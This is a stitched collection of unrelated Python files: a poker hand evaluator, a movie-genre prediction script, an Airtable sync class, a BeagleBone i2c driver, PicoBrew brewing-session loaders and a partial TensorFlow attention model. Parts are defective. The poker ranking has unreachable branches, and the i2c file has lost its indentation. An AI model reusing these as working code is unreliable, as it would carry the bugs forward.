            return False
        return True
    #_______________________
    def is_better(self, score, rank_cards, kicker_cards):
        '''Returns true if input score, rank, kicker
        is better than current hand
        '''
        # Safe before the first update_hand(): score starts at 0, so the
        # first comparison takes the `score > self.score` branch and never
        # touches self.rank_cards. Comparisons rely on P.Hand ordering.
        if score > self.score:
            return True
        elif score == self.score:
            # Better rank of hand (e.g. KK vs QQ) FIXME be careful about two or more rank cards, order
            if rank_cards > self.rank_cards:
                return True
            # Better kickers (e.g. KK, Ace High vs KK, J high)
            elif rank_cards == self.rank_cards and kicker_cards > self.kicker_cards:
                return True
        # Current hand is better
        return False
    #__________________
    def get_score(self):
        # Evaluate every 5-card combination of hand + pool, keeping the best.
        my_poker = Poker()
        card_pool = self.hand + self.pool
        hands = list(combinations(card_pool, self.max_cards))
        for h in hands:
            i_s, i_rc, i_kc = my_poker.eval_hand(h)
            if self.is_better(i_s, i_rc, i_kc):
                self.update_hand(i_s, h, i_rc, i_kc)
    #_______________________________
    def update_hand(self, s, fh, rc, kc):
        # Record the best score/rank/kickers seen so far and rebuild the
        # final 5-card Hand object.
        self.score = s
        self.rank_cards = rc
        self.kicker_cards = kc
        final_hand = P.Hand()
        for c in fh:
            final_hand.add_card(c)
        self.final_hand = final_hand
###
class Poker:
    '''Class to evaluate Poker hand'''
    def __init__(self):
        # NOTE(review): these are locals, not attributes — they have no
        # effect; self.v / self.s are set in eval_hand().
        v = []
        s = []
        pass
    def values(self, cards):
        '''Returns sorted values'''
        # Relies on eval_hand() passing cards already sorted descending.
        #return sorted([c.value for c in cards], reverse=True)
        return [c.value for c in cards]
    def suits(self, cards):
        '''Returns suits'''
        return [c.suit for c in cards]
    def n_kind(self, n, values):
        '''Returns n-of-a-kind value if exists'''
        # Set of values appearing at least n times (may be empty).
        return set( v for v in values if values.count(v) >= n)
    def is_straight(self, values):
        '''Returns straight, and ace-low'''
        # values are sorted descending; ace-low = A,5,4,3,2 (A-2 span == 12).
        ace_low = len(set(values)) == 5 and values[0]-values[-1] == 12 and values[1] ==5
        straight = (len(set(values)) == 5 and values[0]-values[-1] == 4) or ace_low
        return straight, ace_low
    def is_flush(self, suits):
        '''Returns true if all same suit'''
        return len(set(suits)) == 1
    #______________________________________
    def straight_flush(self, cards, rc, kc):
        # NOTE(review): `al` implies `st` (see is_straight), so the
        # `elif al and fl` and `elif st and fl` branches are unreachable,
        # and the only `return sc, rc, kc` sits inside a dead branch — a
        # straight/royal flush falls through to `return False` and is then
        # scored by a later ranker. Confirm intended behavior before use.
        st, al = self.is_straight(self.v)
        fl = self.is_flush(self.s)
        # Royal Flush
        if st and fl:
            if self.v[-1] == 10:
                sc = 10
        # Ace-low straight flush
        elif al and fl:
            sc = 9
            rc.add_card(cards[1])
        # Other straight flush
        elif st and fl:
            sc = 9
            rc.add_card(cards[0])
            return sc, rc, kc
        return False
    #______________________________________
    def four_of_a_kind(self, cards, rc, kc):
        # Quads -> rank cards; the remaining card is the kicker.
        if self.k_4:
            sc = 8
            for c in cards:
                if c.value in self.k_4: rc.add_card(c)
                else: kc.add_card(c)
            return sc, rc, kc
        return False
    #__________________________________
    def full_house(self, cards, rc, kc):
        # Trips plus a distinct pair; trips added first, then the pair.
        if self.k_3 and self.k_2 and len(self.k_2-self.k_3) > 0:
            sc = 7
            for c in cards:
                if c.value in self.k_3: rc.add_card(c)
            for c in cards:
                if c.value in (self.k_2 - self.k_3): rc.add_card(c)
            return sc, rc, kc
        return False
    #______________________________
    def flush(self, cards, rc, kc):
        # All five cards rank; no kickers.
        if self.is_flush(self.s):
            sc = 6
            for c in cards:
                rc.add_card(c)
            return sc, rc, kc
        return False
    #________________________________
    def straight(self, cards, rc, kc):
        # Rank card is the high card (second card for an ace-low straight).
        st, al = self.is_straight(self.v)
        if st:
            sc = 5
            rc.add_card(cards[1]) if al else rc.add_card(cards[0])
            return sc, rc, kc
        return False
    #_______________________________________
    def three_of_a_kind(self, cards, rc, kc):
        if self.k_3:
            sc = 4
            for c in cards:
                if c.value in self.k_3: rc.add_card(c)
                else: kc.add_card(c)
            return sc, rc, kc
        return False
    #________________________________
    def pair(self, cards, rc, kc):
        # Final ranker: two pair, one pair, or high card — always returns.
        # Two pair
        if len(self.k_2) > 1:
            sc = 3
            for c in cards:
                if c.value == max(self.k_2): rc.add_card(c)
                elif c.value not in self.k_2: kc.add_card(c)
            for c in cards:
                if c.value == min(self.k_2): rc.add_card(c)
        # Pair
        elif self.k_2:
            sc = 2
            for c in cards:
                if c.value in self.k_2: rc.add_card(c)
                else: kc.add_card(c)
        # High card
        else:
            sc = 1
            for c in cards:
                if c.value == self.v[0]: rc.add_card(c)
                else: kc.add_card(c)
        return sc, rc, kc
    #_________________________
    def eval_hand(self, cards):
        # Rankers in descending strength; first non-False result wins.
        poker_hands = [self.straight_flush,self.four_of_a_kind,self.full_house,
                       self.flush,self.straight,self.three_of_a_kind,self.pair]
        # NOTE(review): sorts by attribute 'suits', but cards elsewhere
        # expose `.suit` (see suits()); confirm the Card class defines a
        # `suits` attribute, otherwise this raises AttributeError.
        s_cards = sorted(cards, key=attrgetter('value','suits'), reverse=True)
        self.v = self.values(s_cards)
        self.s = self.suits(s_cards)
        self.k_4 = self.n_kind(4, self.v)
        self.k_3 = self.n_kind(3, self.v)
        self.k_2 = self.n_kind(2, self.v)
        rank_cards = P.Hand()
        kicker_cards = P.Hand()
        for ranker in poker_hands:
            rank = ranker(s_cards, rank_cards, kicker_cards)
            if rank: break
        return rank[0], rank[1], rank[2]
|
'''
Project: Predicting movie genres from movie posters
Course: COMPSCI 682 Neural Networks: A Modern Introduction
File: run_external_test.py
Description: Runs test for an external image from its URL on the internet.
Author: <NAME>
'''
import sys
import operator
import numpy as np
import data_load as dl
from os import listdir
import data_manage as dm
from os.path import isfile, join
from keras.models import load_model
# Directory of saved Keras models, taken from the first CLI argument
# (read at import time).
models_path = str(sys.argv[1]) + '/'
eval_models = True
verbose = True
# Show only the top `crop` genre predictions; set to None to show all.
crop = 3
class TransferModel:
    '''
    TransferModel is an object that stores all saved model properties.
    '''
    # Metadata parsed from the saved model's file name (see parse_model).
    min_year = 0
    max_year = 0
    genres = []
    ratio = 0
    epochs = 0
    style = 1
    file_path = ''
    # Keras model; populated by load().
    model = None
    def eval(self):
        '''
        Get scores on input data.
        '''
        print('Loading test data...')
        x_test, y_test = dl.load_data(self.min_year, self.max_year, self.genres, self.ratio, set_type='test', verbose=False)
        print('Evaluating model...')
        scores = self.model.evaluate(x_test, y_test, verbose=0)
        print('Test loss =', scores[0])
        print('Test accuracy =', scores[1])
    def predict(self, movie):
        '''
        Make a prediction using this model.
        '''
        # Single-image batch; movie converts its poster to RGB at this ratio.
        x = [movie.img_to_rgb(self.ratio)]
        x = np.array(x, dtype='float32')
        return self.model.predict(x)
    def load(self):
        '''
        Load the model for testing.
        '''
        self.model = load_model(self.file_path)
    def __str__(self):
        return (
            'Model v' + str(self.style) \
            + ' (' + str(self.min_year) + '-' + str(self.max_year) \
            + ' / g' + str(len(self.genres)) \
            + ' / r' + str(self.ratio) \
            + ' / e' + str(self.epochs) \
            + ')'
        )
def parse_model(file_name):
    '''
    Reconstruct a TransferModel's metadata from its underscore-separated
    file name (fields at fixed positions; the genre list is fixed).
    '''
    parts = file_name.split('_')
    model = TransferModel()
    model.min_year = int(parts[3])
    model.max_year = int(parts[4])
    model.genres = ['Horror', 'Romance', 'Action', 'Documentary']
    model.ratio = int(parts[6][1:])
    model.epochs = int(parts[7][1:])
    model.style = int(parts[8].split('.')[0][1:])
    model.file_path = file_name
    return model
def list_models():
    '''Return sorted saved-model file names under models_path.'''
    names = [
        f for f in listdir(models_path)
        if isfile(join(models_path, f)) and f.startswith('genres_')
    ]
    return sorted(names)
def repeat_length(string, length):
    '''Tile *string* and truncate so the result is exactly *length* chars.'''
    repeats = int(length / len(string)) + 1
    return (string * repeats)[:length]
def format_preds(movie, genres, preds):
    '''
    Format predictions from multi-hot encoding to human readable structure.

    Genres absent from the movie's actual genre list are marked with [!];
    output is padded so predictions line up across movies.
    '''
    probabilities = {genre: preds[0][i] for i, genre in enumerate(genres)}
    ranked = sorted(probabilities.items(), key=operator.itemgetter(1), reverse=True)
    rendered = []
    for genre, probability in ranked:
        marker = '' if genre in movie.genres else '[!]'
        rendered.append(genre + marker + ': ' + "{:.0%}".format(probability))
    padding = repeat_length(' ', 33 - len(str(movie)))
    shown = rendered if crop is None else rendered[:crop]
    return str(movie) + padding + str(shown)
def main():
    '''
    Test the external movie using models in the models_path directory.
    '''
    for model_file in list_models():
        saved_model = parse_model(models_path + model_file)
        saved_model.load()
        print('')
        print('------------------------------------------------------------------------')
        print(saved_model)
        # Expected genre is unknown for an external URL, hence the '?' key;
        # the movie title/URL comes from the second CLI argument.
        test_movies = {}
        test_movies['?'] = [
            str(sys.argv[2]),
        ]
        if verbose:
            for expected_genre, movies_titles in sorted(test_movies.items()):
                for movie_title in movies_titles:
                    movie = dm.search_movie_external(title=movie_title)
                    if movie is not None:
                        preds = saved_model.predict(movie)
                        print(format_preds(movie, saved_model.genres, preds))
                    else:
                        print(movie_title + ' not found')
        print('------------------------------------------------------------------------')
# Standard script entry guard.
if __name__ == '__main__':
    main()
|
<filename>app/Populator.py
import posixpath
from typing import Dict, List
from pyairtable import Api, Table
from pyairtable.metadata import get_api_bases
from pyairtable.formulas import match
from Schema import Schema
class Populator:
    """Mirrors Airtable workspace metadata (bases, users, access grants)
    into bookkeeping tables inside a single Airtable base."""

    base_id: str = None
    airtable_api: Api = None
    base_table: Table = None
    users_table: Table = None
    workspace_id: str = None

    def __init__(self, base_id: str, airtable_api_key: str, workspace_id: str):
        """Create API/table handles; a non-empty workspace_id is required."""
        self.base_id = base_id
        self.airtable_api = Api(api_key=airtable_api_key)
        self.base_table = Table(api_key=airtable_api_key, base_id=self.base_id, table_name=Schema.BASES_TABLE_NAME)
        self.users_table = Table(api_key=airtable_api_key, base_id=self.base_id, table_name=Schema.USERS_TABLE_NAME)
        self.users_to_base_table = Table(api_key=airtable_api_key, base_id=self.base_id,
                                         table_name=Schema.USERSTOBASES_TABLE_NAME)
        self.workspace_id = workspace_id
        if not self.workspace_id:
            raise Exception("Workspace ID is required")

    def upsert(self, table: Table, column_name: str, column_value: str, data: Dict):
        """Update the first record where column_name == column_value, or create it.

        Note: on create, `data` is mutated (the key column is added) —
        callers should not reuse the dict.
        """
        found = table.all(formula=match({column_name: column_value}))
        if found:
            table.update(record_id=found[0]['id'], fields=data)
        else:
            data[column_name] = column_value
            table.create(fields=data)

    def populate_bases(self):
        """Upsert one row per base visible to this API key."""
        bases = get_api_bases(self.airtable_api)
        for b in bases['bases']:
            base_id = b['id']
            base_name = b['name']
            self.upsert(table=self.base_table, column_name='Id', column_value=base_id, data={'Name': base_name})

    def populate(self):
        """Run the full sync: bases, then workspace and base collaborators."""
        self.populate_bases()
        e = self.workspaces(workspace_id=self.workspace_id)
        self.populate_workspace_collaborators(collaborators=e['collaborators']['workspaceCollaborators'])
        self.populate_base_collaborators(base_collaborators=e['collaborators']['baseCollaborators'])
        # TODO finish this method.
        return -1

    def clear(self):
        """Delete every record from the bases table, in batches of 1000."""
        records = True
        while records:
            records = self.base_table.all(max_records=1000)
            ids = [d['id'] for d in records]
            self.base_table.batch_delete(ids)

    def workspaces(self, workspace_id):
        """Fetch workspace metadata including collaborators.

        Uses pyairtable's private _request helper because the metadata API
        is not wrapped publicly.
        """
        base_schema_url = posixpath.join(
            self.airtable_api.API_URL, "meta", "workspaces", workspace_id
        ) + "?include=collaborators"
        return self.airtable_api._request("get", base_schema_url)

    def populate_workspace_collaborators(self, collaborators):
        """Upsert one user row per workspace collaborator with their grant info."""
        for u in collaborators:
            user_id = u['userId']
            email = u['email']
            permission_level = u['permissionLevel']
            self.upsert(table=self.users_table, column_name='Id', column_value=user_id, data={'Email': email,
                        'Workspace Permissions': permission_level,
                        'Workspace Grant Date': u['createdTime']})

    def populate_base_collaborators(self, base_collaborators: List):
        """Upsert per-base collaborator users and link user<->base records."""
        for u in base_collaborators:
            user_id = u['userId']
            email = u['email']
            self.upsert(table=self.users_table, column_name='Id', column_value=user_id, data={'Email': email})
            base_id = u['baseId']
            base = self.base_table.first(formula=match({'Id': base_id}))
            if base is None:
                # Bug fix: previously fell through and crashed on base['id'].
                print(f"Unable to find base: {base_id}")
                continue
            base_record_key = base['id']
            user = self.users_table.first(formula=match({'Id': user_id}))
            if user is None:
                # Bug fix: previously fell through and crashed on user['id'].
                print(f"Unable to find user: {user_id}")
                continue
            user_record_key = user['id']
            permission_level = u['permissionLevel']
            user_base = f"{user_id}-{base_id}"
            self.upsert(table=self.users_to_base_table,
                        column_name='User Base',
                        column_value=user_base,
                        data={'Base': [base_record_key],
                              'User': [user_record_key],
                              'Access Type': permission_level
                              })
|
# Copyright (c) 2013 The Chromium OS Authors. All rights reserved.
# Use of this source code is governed by a BSD-style license that can be
# found in the LICENSE file.
"""Allows creation of i2c interface for beaglebone devices."""
import logging
import subprocess
import bbmux_controller
import common as c
import i2c_base
class BBi2cError(c.InterfaceError):
  """Class for exceptions of BBi2c."""
  def __init__(self, msg, value=0):
    """BBi2cError constructor.
    Args:
      msg: string, message describing error in detail
      value: integer, value of error when non-zero status returned. Default=0
    """
    super(BBi2cError, self).__init__(msg, value)
    # Keep the details on the instance for callers that inspect them.
    self.msg = msg
    self.value = value
class BBi2c(i2c_base.BaseI2CBus):
"""Provide interface to i2c through beaglebone"""
  def __init__(self, interface):
    """BBi2c constructor.

    Args:
      interface: dict of interface config; must contain a 'bus_num' entry.
    """
    i2c_base.BaseI2CBus.__init__(self)
    self._logger = logging.getLogger('BBi2c')
    self._interface = interface
    self._bus_num = interface['bus_num']
    # Older kernels utilizing the omap mux starts counting from 1
    if bbmux_controller.use_omapmux():
      self._bus_num += 1
  @staticmethod
  def Build(interface_data, **kwargs):
    """Factory method to implement the interface.

    Args:
      interface_data: dict of interface config passed to the constructor.
      **kwargs: ignored; accepted for factory-signature compatibility.

    Returns:
      BBi2c instance for the given interface.
    """
    return BBi2c(interface=interface_data)
@staticmethod
def name():
"""Name to request interface by in interface config maps."""
return 'bb_i2c'
def _write(self, child, address, wlist):
"""Preform a single i2cset write command.
Args:
child: 7-bit address of the child device.
address: data address we are writing to. Will be written to the i2c bus.
wlist: list of bytes to write to the child. List length must be between
0-2 bytes.
Raises:
BBi2cError: If wlist has more than 3 bytes or the i2cset call fails.
"""
# i2cset can write up to 3 bytes to an i2c device in the format of:
# [1-byte address][0-2 bytes of data]
args = ['i2cset', '-y', str(self._bus_num), '0x%02x' % child, address]
if len(wlist) > 2:
raise BBi2cError('Can only write up to 3 bytes (1-byte register address '
'and 2-byte word) per i2cset command. '
'wlist: %s' % wlist)
# Form the data argument and reverse the bytes due to endianness.
if wlist:
data = '0x' + ''.join('%02x' % wbyte for wbyte in reversed(wlist))
args.append(data)
if len(wlist) == 2:
# Put the command in word mode.
args.append('w')
try:
logging.debug(' '.join(args))
subprocess.check_call(args)
except subprocess.CalledProcessError:
raise BBi2cError('Failed i2c write to child address: %s data: %s' %
(child, wlist))
def _read(self, child, address, rcnt):
"""Read from a child i2c device.
Args:
child: 7-bit address of the child device.
address: data address to read.
rcnt: number of bytes (0-2) to read from the device.
Returns:
list of bytes read from i2c device.
Raises:
BBi2cError: If read (i2cget call) fails or if rcnt > 2.
"""
if not rcnt:
return []
if rcnt > 2:
raise BBi2cError('Can only read up to 2 bytes per i2cget command.')
if rcnt == 2:
return self._read_two_bytes(child, address)
return self._read_one_byte(child)
def _read_one_byte(self, child):
"""Read one byte from a child i2c device.
Args:
child: 7-bit address of the child device.
Returns:
list of bytes read from i2c device.
Raises:
BBi2cError: If read (i2cget call) fails.
"""
read_bytes = []
args = ['i2cget', '-y', str(self._bus_num), '0x%x' % child]
try:
logging.debug(' '.join(args))
read_value = subprocess.check_output(args)
except subprocess.CalledProcessError:
raise BBi2cError('Failed i2c read of 1 byte from child address: %s' \
% child)
read_value_int = int(read_value, 0)
read_bytes.append(read_value_int)
return read_bytes
def _read_two_bytes(self, child, address):
"""Read two byte from a child i2c device.
Args:
child: 7-bit address of the child device.
address: data address to read.
Returns:
list of bytes read from i2c device.
Raises:
BBi2cError: If read (i2cget call) fails.
"""
read_bytes = []
args = ['i2cget', '-y', str(self._bus_num), '0x%x' % child, address, 'w']
try:
logging.debug(' '.join(args))
read_value = subprocess.check_output(args)
except subprocess.CalledProcessError:
raise BBi2cError('Failed i2c read of 2 bytes from child address: %s, '
'data address: %s.' % (child, address))
read_value_int = int(read_value, 0)
# Grab the second byte first (converting little endian to big).
read_bytes.append(read_value_int & 0xff)
# Grab the first byte.
read_bytes.append(read_value_int >> 8)
return read_bytes
def _raw_wr_rd(self, child, wlist, rcnt):
"""Write and/or read a child i2c device.
Args:
child: 7-bit address of the child device
wlist: list of bytes to write to the child. If list length is zero its
just a read.
rcnt: number of bytes (0-2) to read from the device. If zero, its just a
write.
Returns:
list of bytes read from i2c device.
"""
self._logger.debug('wr_rd. child: 0x%x, wlist: %s, rcnt: %s', child, wlist,
rcnt)
address = '0x%02x' % wlist[0]
if wlist:
self._write(child, address, wlist[1:])
return self._read(child, address, rcnt)
def test():
  """Test code. (forked from ftdii2c.py)

  Performs one addressed read of child 0x21 register 0, then 1000 pure
  reads, counting failures. Requires real i2c hardware on bus 3.
  """
  loglevel = logging.INFO
  logging.basicConfig(
      level=loglevel,
      format='%(asctime)s - %(name)s - ' + '%(levelname)s - %(message)s')
  # BUG FIX: BBi2c's constructor indexes interface['bus_num']; passing a
  # bare int previously raised a TypeError.
  i2c = BBi2c({'bus_num': 3})
  wbuf = [0]
  child = 0x21
  rbuf = i2c.wr_rd(child, wbuf, 1)
  logging.info('first: i2c read of child=0x%02x reg=0x%02x == 0x%02x', child,
               wbuf[0], rbuf[0])
  errcnt = 0
  for cnt in range(1000):
    try:
      rbuf = i2c.wr_rd(child, [], 1)
    except BBi2cError:
      # BUG FIX: narrowed from a bare except, which also swallowed
      # KeyboardInterrupt/SystemExit.
      errcnt += 1
  logging.error('errs = %d cnt = %d', errcnt, cnt)
  logging.info('last: i2c read of child=0x%02x reg=0x%02x == 0x%02x', child,
               wbuf[0], rbuf[0])


if __name__ == '__main__':
  test()
|
<reponame>metahertz/picobrew_pico
import json
from .config import brew_active_sessions_path
from .model import PicoBrewSession
file_glob_pattern = "[!._]*.json"
active_brew_sessions = {}
active_ferm_sessions = {}
def load_brew_session(file):
    """Read one brew-session JSON file and summarize it for the UI.

    The filename stem encodes session metadata:
    0 = Date, 1 = UID, 2 = RFID / Session GUID (guid), 3 = Session Name,
    4 = Session Type (integer - z only)
    """
    info = file.stem.split('#')
    name = info[3].replace('_', ' ')
    step = ''
    with open(file) as fp:
        raw_data = fp.read().rstrip()
    if raw_data.endswith(','):
        # Recover from incomplete session json data file
        raw_data = raw_data[:-1] + '\n]'
    elif raw_data.endswith('[') or raw_data == '':
        # Recover from aborted session data file
        raw_data = '[\n]'
    json_data = json.loads(raw_data)

    uid = info[1]
    chart_id = info[0] + '_' + info[2]
    alias = active_brew_sessions[uid].alias if uid in active_brew_sessions else ''
    session_type = int(info[4]) if len(info) > 4 else None

    session = {
        'date': info[0],
        'name': name,
        'uid': uid,
        'session': info[2],
        'is_pico': len(uid) == 32,
        'type': session_type,
        'alias': alias,
        'data': json_data,
        'graph': get_brew_graph_data(chart_id, name, step, json_data)
    }
    # Surface the recovery step recorded in the last sample, if present.
    if json_data and 'recovery' in json_data[-1]:
        session['recovery'] = json_data[-1]['recovery']
    return session
def get_brew_graph_data(chart_id, session_name, session_step, session_data, is_pico=None):
    """Build the chart payload for one brew session.

    Args:
        chart_id: unique id for the rendered chart.
        session_name: chart title text.
        session_step: chart subtitle text.
        session_data: list of sample dicts from the session log.
        is_pico: force the Pico/ZSeries series layout even with no block data.

    Returns:
        dict with chart metadata, per-step event plot lines and the series
        matching the machine type inferred from the sample keys.
    """
    wort_data = []       # Shared
    block_data = []      # Pico and ZSeries Only
    board_data = []      # Zymatic Only
    heat1_data = []      # Zymatic Only
    heat2_data = []      # Zymatic Only
    target_data = []     # ZSeries Only
    drain_data = []      # ZSeries Only
    ambient_data = []    # ZSeries Only
    valve_position = []  # ZSeries Only
    events = []
    for sample in session_data:
        if 'therm' in sample and 'wort' in sample:  # Pico and ZSeries
            wort_data.append([sample['time'], int(sample['wort'])])
            block_data.append([sample['time'], int(sample['therm'])])
        if all(key in sample for key in ('target', 'drain', 'ambient', 'position')):  # ZSeries
            target_data.append([sample['time'], int(sample['target'])])
            drain_data.append([sample['time'], int(sample['drain'])])
            ambient_data.append([sample['time'], int(sample['ambient'])])
            # TODO figure out how to add `position`, `pause_state` and `error` to the graphs?
            valve_position.append([sample['time'], int(sample['position'])])
        if all(key in sample for key in ('wort', 'board', 'heat1', 'heat2')):  # Zymatic
            wort_data.append([sample['time'], int(sample['wort'])])
            board_data.append([sample['time'], int(sample['board'])])
            heat1_data.append([sample['time'], int(sample['heat1'])])
            heat2_data.append([sample['time'], int(sample['heat2'])])
        # add an overlay event for each step
        if 'event' in sample:
            events.append({'color': 'black', 'width': '2', 'value': sample['time'],
                           'label': {'text': sample['event'], 'style': {'color': 'white', 'fontWeight': 'bold'},
                                     'verticalAlign': 'top', 'x': -15, 'y': 0}})
    graph_data = {
        'chart_id': chart_id,
        'title': {'text': session_name},
        'subtitle': {'text': session_step},
        'xaplotlines': events
    }
    if ambient_data:
        series = [
            {'name': 'Target', 'data': target_data},
            {'name': 'Wort', 'data': wort_data},
            {'name': 'Heat Exchanger', 'data': block_data},
            {'name': 'Drain', 'data': drain_data},
            {'name': 'Ambient', 'data': ambient_data}
        ]
    elif block_data or is_pico:
        series = [
            {'name': 'Wort', 'data': wort_data},
            {'name': 'Heat Block', 'data': block_data}
        ]
    else:
        series = [
            {'name': 'Wort', 'data': wort_data},
            {'name': 'Heat Loop', 'data': heat1_data},
            {'name': 'Board', 'data': board_data},
            {'name': 'Heat Loop 2', 'data': heat2_data}
        ]
    graph_data['series'] = series
    return graph_data
def load_ferm_session(file):
    """Read one fermentation-session JSON file and summarize it for the UI.

    The filename stem encodes metadata: 0 = Date, 1 = Device UID.
    """
    info = file.stem.split('#')
    with open(file) as fp:
        raw_data = fp.read().rstrip()
    if raw_data.endswith(','):
        # Recover from incomplete json data file
        raw_data = raw_data[:-1] + '\n]'
    json_data = json.loads(raw_data)

    uid = info[1]
    # Prefer the live session alias when this device is currently active.
    name = active_ferm_sessions[uid].alias if uid in active_ferm_sessions else uid
    return {
        'date': info[0],
        'name': name,
        'graph': get_ferm_graph_data(info[0] + '_' + uid, None, json_data)
    }
def get_ferm_graph_data(chart_id, voltage, session_data):
    """Build the chart payload for a fermentation session.

    Args:
        chart_id: unique id for the rendered chart.
        voltage: battery voltage string shown as a subtitle, or falsy to omit.
        session_data: list of sample dicts with 'time', 'temp' and 'pres'.
    """
    temp_data = [[sample['time'], float(sample['temp'])] for sample in session_data]
    pres_data = [[sample['time'], float(sample['pres'])] for sample in session_data]
    graph_data = {
        'chart_id': chart_id,
        'title': {'text': 'Fermentation'},
        'series': [
            {
                'name': 'Temperature',
                'data': temp_data
            }, {
                'name': 'Pressure',
                'data': pres_data,
                'yAxis': 1
            }
        ],
    }
    if voltage:
        graph_data['subtitle'] = {'text': 'Voltage: ' + voltage}
    return graph_data
def restore_active_sessions():
    """Rebuild in-memory brew-session state from files left by a previous run.

    Scans the active-sessions directory and reconstructs a PicoBrewSession for
    each file found, re-opening the file in append mode so logging can
    continue. Only runs when ``active_brew_sessions`` is empty (i.e. once at
    server start-up).
    """
    # initialize active sessions during start up
    if active_brew_sessions == {}:
        # print('DEBUG: restore_active_sessions() fetching abandoned server active sessions')
        active_brew_session_files = list(brew_active_sessions_path().glob(file_glob_pattern))
        for file in active_brew_session_files:
            # print('DEBUG: restore_active_sessions() found {} as an active session'.format(file))
            brew_session = load_brew_session(file)
            # print('DEBUG: restore_active_sessions() {}'.format(brew_session))
            # NOTE(review): this placeholder list is unconditionally replaced
            # by the PicoBrewSession assignment at the end of the loop body —
            # it appears redundant.
            if brew_session['uid'] not in active_brew_sessions:
                active_brew_sessions[brew_session['uid']] = []
            session = PicoBrewSession()
            # Re-open in append mode; the handle is intentionally kept open so
            # further samples continue the same log file.
            session.file = open(file, 'a')
            session.file.flush()
            session.filepath = file
            session.alias = brew_session['alias']
            session.created_at = brew_session['date']
            session.name = brew_session['name']
            session.type = brew_session['type']
            session.session = brew_session['session']  # session guid
            session.id = -1  # session id (integer)
            if 'recovery' in brew_session:
                session.recovery = brew_session['recovery']  # find last step name
            # session.remaining_time = None
            session.is_pico = brew_session['is_pico']
            session.data = brew_session['data']
            active_brew_sessions[brew_session['uid']] = session
|
<filename>adaptive_attention.py<gh_stars>1-10
import tensorflow as tf
from tensorflow.python.ops import rnn, rnn_cell, seq2seq
from utils import get_seq_length, _add_gradient_noise, _position_encoding, _xavier_weight_init, _last_relevant, batch_norm
#from https://github.com/DeNeutoy/act-rte-inference/blob/master/AdaptiveIAAModel.py
class Adaptive_Episodes_Config(object):
    """Hyperparameters for the adaptive-episodes attention model."""

    # --- optimization ---
    init_scale = 0.05
    learning_rate = 0.001
    max_grad_norm = 5
    max_epoch = 4
    max_max_epoch = 3
    keep_prob = 0.8
    lr_decay = 0.8
    batch_size = 32

    # --- architecture ---
    num_layers = 2
    num_steps = 20
    encoder_size = 128
    inference_size = 256
    bidirectional = False

    # --- embeddings ---
    vocab_size = 10000
    embedding_size = 300
    embedding_reg = 0.0001
    train_embeddings = True
    use_embeddings = False

    # --- adaptive computation (halting) ---
    eps = 0.1
    max_computation = 20
    step_penalty = 0.00001
#class AdaptiveIAAModel(object):
class Adaptive_Episodes(object):
    """ Implements Iterative Alternating Attention for Machine Reading
    http://arxiv.org/pdf/1606.02245v3.pdf """
    # NOTE(review): written against a TF 0.x API (tf.pack/tf.unpack,
    # tf.split(dim, n, x), tf.concat(dim, values), tf.nn.rnn_cell._linear).
    def __init__(self, config, pretrained_embeddings=None,
                 update_embeddings=True, is_training=False):
        # Only the config is stored here. Attributes read by other methods
        # (self.bidirectional, self.hidden_size, self.is_training, ...) are
        # never set in this constructor — presumably assigned by a caller or
        # subclass, or via do_generate_episodes(). TODO confirm.
        self.config = config

    def gate_mechanism(self, gate_input, scope):
        """Two ReLU hidden layers + sigmoid output producing a gate vector."""
        with tf.variable_scope(scope):
            # Input size depends on whether the encoder is bidirectional.
            if self.bidirectional:
                size = 3*2*self.config.encoder_size + self.hidden_size
                out_size = 2*self.config.encoder_size
            else:
                size = 3*self.config.encoder_size + self.hidden_size
                out_size = self.config.encoder_size
            hidden1_w = tf.get_variable("hidden1_w", [size, size])
            hidden1_b = tf.get_variable("hidden1_b", [size])
            hidden2_w = tf.get_variable("hidden2_w", [size, size])
            hidden2_b = tf.get_variable("hidden2_b", [size])
            sigmoid_w = tf.get_variable("sigmoid_w", [size, out_size])
            sigmoid_b = tf.get_variable("sigmoid_b", [out_size])
            # Dropout on the input and after the first hidden layer, only
            # during training.
            if self.config.keep_prob < 1.0 and self.is_training:
                gate_input = tf.nn.dropout(gate_input, self.config.keep_prob)
            hidden1 = tf.nn.relu(tf.matmul(gate_input, hidden1_w) + hidden1_b)
            if self.config.keep_prob < 1.0 and self.is_training:
                hidden1 = tf.nn.dropout(hidden1, self.config.keep_prob)
            hidden2 = tf.nn.relu(tf.matmul(hidden1, hidden2_w) + hidden2_b)
            gate_output = tf.nn.sigmoid(tf.matmul(hidden2, sigmoid_w) + sigmoid_b)
        return gate_output

    def get_attention(self, prev_memory, fact_vec):
        """Use question vector and previous memory to create scalar attention for current fact"""
        # reuse=True: the attention variables must already exist in scope.
        with tf.variable_scope("attention", reuse=True, initializer=_xavier_weight_init()):
            W_1 = tf.get_variable("W_1")
            b_1 = tf.get_variable("bias_1")
            W_2 = tf.get_variable("W_2")
            b_2 = tf.get_variable("bias_2")
            # Interaction features: elementwise product and absolute
            # difference of fact and memory, scored by a 2-layer MLP.
            features = [fact_vec*prev_memory, tf.abs(fact_vec - prev_memory)]
            feature_vec = tf.concat(1, features)
            attention = tf.matmul(tf.tanh(tf.matmul(feature_vec, W_1) + b_1), W_2) + b_2
        return attention

    def _attention_GRU_step(self, rnn_input, h, g):
        """Implement attention GRU as described by https://arxiv.org/abs/1603.01417"""
        with tf.variable_scope("attention_gru", reuse=True, initializer=_xavier_weight_init()):
            Wr = tf.get_variable("Wr")
            Ur = tf.get_variable("Ur")
            br = tf.get_variable("bias_r")
            W = tf.get_variable("W")
            U = tf.get_variable("U")
            bh = tf.get_variable("bias_h")
            # Reset gate and candidate state as in a GRU, but the update gate
            # is replaced by the scalar attention g.
            r = tf.sigmoid(tf.matmul(rnn_input, Wr) + tf.matmul(h, Ur) + br)
            h_hat = tf.tanh(tf.matmul(rnn_input, W) + r*tf.matmul(h, U) + bh)
            rnn_output = g*h_hat + (1-g)*h
        return rnn_output

    #analogous to inference_step
    def generate_episode(self, batch_mask, prob_compare, prob, counter, episode, fact_vecs, acc_states, counter_int, weight_container, bias_container):
        """Generate episode by applying attention to current fact vectors through a modified GRU"""
        # Loop body for tf.while_loop in do_generate_episodes; all arguments
        # are loop variables and are returned (possibly updated) in order.
        fact_vecs_t = tf.unpack(tf.transpose(fact_vecs, perm=[1,0,2]))
        '''TRY REPLACING acc_states WITH episode AND SEE WHICH WORKS BETTER'''
        # One scalar attention per fact, normalized over the input length.
        attentions = [tf.squeeze(self.get_attention(acc_states, fv), squeeze_dims=[1]) for fv in fact_vecs_t]
        attentions = tf.transpose(tf.pack(attentions))
        softs = tf.nn.softmax(attentions)
        softs = tf.split(1, self.max_input_len, softs)
        gru_outputs = []
